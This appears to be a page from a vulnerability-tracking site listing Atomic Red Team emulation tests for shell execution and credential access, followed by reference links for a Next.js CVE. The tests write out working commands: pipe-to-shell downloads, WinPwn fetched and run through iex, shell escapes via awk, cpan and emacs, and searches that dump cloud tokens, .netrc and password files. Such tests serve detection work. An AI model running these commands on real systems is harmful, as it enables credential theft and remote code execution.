curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (9)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2025-29927
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
github.com
GitHub CVE x_refsource_MISC
https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2
github.com
GitHub CVE x_refsource_MISC
https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48
github.com
GitHub CVE x_refsource_MISC
https://github.com/vercel/next.js/releases/tag/v12.3.5
github.com
GitHub CVE x_refsource_MISC
https://github.com/vercel/next.js/releases/tag/v13.5.9
openwall.com
NVD API Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2025/03/23/3
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2025/03/23/4
security.netapp.com
NVD API Third Party Advisory
https://security.netapp.com/advisory/ntap-20250328-0002/